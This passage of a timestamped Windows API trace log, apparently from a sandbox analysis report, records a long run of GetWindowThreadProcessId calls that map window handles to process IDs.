	[0849.950] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x7dc
	[0849.950] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x768
	[0849.951] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x764
	[0849.951] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x820
	[0849.951] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x810
	[0849.951] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x794
	[0849.951] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x83c
	[0849.951] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x7ac
	[0849.951] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xb44
	[0849.951] GetWindowThreadProcessId (in: hWnd=0x108d6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x6bc
	[0849.951] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xb5c
	[0849.952] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x838
	[0849.952] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.952] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.952] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.952] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.952] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.952] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.952] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.953] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0849.953] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x818
	[0849.953] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x5b8
	[0849.953] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x494
	[0849.953] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1ec
	[0851.779] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x440
	[0851.779] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x7e8
	[0851.779] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x730
	[0851.779] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x2c8
	[0851.779] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x31c
	[0851.779] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x330
	[0851.779] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x128
	[0851.780] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x5c8
	[0851.780] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x6f8
	[0851.780] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x358
	[0851.780] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x73c
	[0851.780] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xb0
	[0851.780] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x250
	[0851.780] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x240
	[0851.780] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x790
	[0851.781] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x61c
	[0851.781] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x540
	[0851.781] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x538
	[0851.781] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x568
	[0851.781] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x538
	[0851.781] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x568
	[0851.781] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x538
	[0851.781] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x540
	[0851.782] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x540
	[0851.782] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x57c
	[0851.782] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x460
	[0851.782] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x554
	[0851.782] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0851.782] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x528
	[0851.782] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0851.782] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0851.783] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0851.783] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x79c
	[0851.783] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0851.783] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4e0
	[0851.783] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0851.783] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x460
	[0851.783] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x460
	[0851.783] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x44c
	[0851.784] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x778
	[0851.784] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x460
	[0851.784] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x558
	[0851.784] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0851.784] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x4d0
	[0851.784] GetWindowThreadProcessId (in: hWnd=0x10b54, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x16f0
	[0851.784] GetWindowThreadProcessId (in: hWnd=0x10b48, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1338
	[0851.784] GetWindowThreadProcessId (in: hWnd=0x10b3e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1ca0
	[0851.784] GetWindowThreadProcessId (in: hWnd=0x10b34, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x238c
	[0851.785] GetWindowThreadProcessId (in: hWnd=0x10b2a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1b08
	[0851.785] GetWindowThreadProcessId (in: hWnd=0x10b0e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1a8c
	[0851.785] GetWindowThreadProcessId (in: hWnd=0x10af8, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x18e0
	[0851.785] GetWindowThreadProcessId (in: hWnd=0x10aec, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x2344
	[0851.785] GetWindowThreadProcessId (in: hWnd=0x10ae0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1d8c
	[0851.785] GetWindowThreadProcessId (in: hWnd=0x10ad4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1038
	[0851.785] GetWindowThreadProcessId (in: hWnd=0x10ad0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1a58
	[0851.785] GetWindowThreadProcessId (in: hWnd=0x10acc, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1c7c
	[0851.786] GetWindowThreadProcessId (in: hWnd=0x10ac6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1f04
	[0851.786] GetWindowThreadProcessId (in: hWnd=0x10ac2, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x18b8
	[0851.786] GetWindowThreadProcessId (in: hWnd=0x40278, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x22c8
	[0851.786] GetWindowThreadProcessId (in: hWnd=0x10abe, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x21b8
	[0851.786] GetWindowThreadProcessId (in: hWnd=0x20958, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x21c0
	[0851.786] GetWindowThreadProcessId (in: hWnd=0x10a7a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x219c
	[0851.786] GetWindowThreadProcessId (in: hWnd=0x10a6a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x20f4
	[0851.786] GetWindowThreadProcessId (in: hWnd=0x10a4c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x20e4
	[0851.787] GetWindowThreadProcessId (in: hWnd=0x10a40, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x20e8
	[0851.787] GetWindowThreadProcessId (in: hWnd=0x10a36, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x20ec
	[0851.787] GetWindowThreadProcessId (in: hWnd=0x20602, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x20f0
	[0851.787] GetWindowThreadProcessId (in: hWnd=0x10a2e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1e34
	[0851.787] GetWindowThreadProcessId (in: hWnd=0x10a28, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xc38
	[0851.787] GetWindowThreadProcessId (in: hWnd=0x10a20, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1fe4
	[0851.787] GetWindowThreadProcessId (in: hWnd=0x10a10, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1f10
	[0851.787] GetWindowThreadProcessId (in: hWnd=0x10a0c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1f0c
	[0851.788] GetWindowThreadProcessId (in: hWnd=0x10a08, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1f08
	[0851.788] GetWindowThreadProcessId (in: hWnd=0x109fc, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1ef0
	[0851.788] GetWindowThreadProcessId (in: hWnd=0x109ee, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1eec
	[0851.788] GetWindowThreadProcessId (in: hWnd=0x109e0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1ee4
	[0851.788] GetWindowThreadProcessId (in: hWnd=0x109c6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1ed8
	[0851.788] GetWindowThreadProcessId (in: hWnd=0x109b6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1ed0
	[0851.788] GetWindowThreadProcessId (in: hWnd=0x1099c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1e8c
	[0851.788] GetWindowThreadProcessId (in: hWnd=0x1098e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1e88
	[0851.788] GetWindowThreadProcessId (in: hWnd=0x1097e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1e84
	[0851.789] GetWindowThreadProcessId (in: hWnd=0x20620, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1604
	[0851.789] GetWindowThreadProcessId (in: hWnd=0x1095a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1c2c
	[0851.789] GetWindowThreadProcessId (in: hWnd=0x10966, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1c08
	[0851.789] GetWindowThreadProcessId (in: hWnd=0x10964, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1c0c
	[0851.789] GetWindowThreadProcessId (in: hWnd=0x10962, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1c10
	[0851.789] GetWindowThreadProcessId (in: hWnd=0x1095e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1c14
	[0851.789] GetWindowThreadProcessId (in: hWnd=0x2043c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1c18
	[0851.789] GetWindowThreadProcessId (in: hWnd=0x206a6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1c1c
	[0851.790] GetWindowThreadProcessId (in: hWnd=0x4092e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x16fc
	[0851.790] GetWindowThreadProcessId (in: hWnd=0x30426, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1e78
	[0851.790] GetWindowThreadProcessId (in: hWnd=0x10956, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1c20
	[0851.790] GetWindowThreadProcessId (in: hWnd=0x503ea, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x191c
	[0851.790] GetWindowThreadProcessId (in: hWnd=0x108c6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1748
	[0851.790] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1bb4
	[0851.790] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x10bc
	[0851.790] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1b50
	[0851.791] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x14b4
	[0851.791] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x149c
	[0851.791] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x14a8
	[0851.791] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1490
	[0851.791] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x14a4
	[0851.791] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x148c
	[0851.791] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1458
	[0851.791] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1b4c
	[0851.792] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1b3c
	[0851.792] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x19bc
	[0851.792] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x199c
	[0851.792] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1998
	[0851.795] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1994
	[0851.795] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1990
	[0851.795] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1984
	[0851.795] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x197c
	[0851.796] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1978
	[0851.796] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1824
	[0851.796] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1088
	[0851.796] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1908
	[0851.796] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x18cc
	[0851.796] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x18d0
	[0851.796] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1840
	[0851.796] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x10c4
	[0851.797] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x128c
	[0851.797] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x16e8
	[0851.797] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x16cc
	[0851.797] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x274
	[0851.797] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x10e0
	[0851.797] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x10cc
	[0851.797] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x10c0
	[0851.797] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x10d0
	[0851.798] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1198
	[0851.798] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1080
	[0851.798] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1074
	[0851.798] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x106c
	[0851.798] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1474
	[0851.798] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1414
	[0851.798] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xbd0
	[0851.798] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x550
	[0851.799] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xa38
	[0851.799] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x16d0
	[0851.799] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x16d4
	[0851.799] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x15bc
	[0851.799] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x15a0
	[0851.799] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x159c
	[0851.799] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1598
	[0851.799] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1594
	[0851.799] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1590
	[0851.800] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x158c
	[0851.800] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1588
	[0851.800] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1584
	[0851.800] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1580
	[0851.800] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x157c
	[0851.800] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1488
	[0851.800] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1404
	[0851.800] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x11b8
	[0851.801] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xbd4
	[0851.801] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xe0c
	[0851.801] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xd30
	[0851.801] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xe70
	[0851.801] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x13b8
	[0851.801] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xe20
	[0851.801] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xe2c
	[0851.801] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xe00
	[0851.802] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xe04
	[0851.802] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xc94
	[0851.802] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x13b0
	[0851.802] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x13ac
	[0851.802] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x13a8
	[0851.802] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1374
	[0851.802] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x132c
	[0851.802] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1328
	[0851.803] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x12d0
	[0851.803] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x12cc
	[0851.803] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x12c8
	[0851.803] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1290
	[0851.803] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1218
	[0851.803] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1214
	[0851.803] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x11ec
	[0851.803] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x11e8
	[0851.804] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x11cc
	[0851.804] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x1140
	[0851.804] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xe6c
	[0851.804] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0x6e8
	[0851.804] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xc6c
	[0851.804] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0xed720 | out: lpdwProcessId=0xed720) returned 0xf94
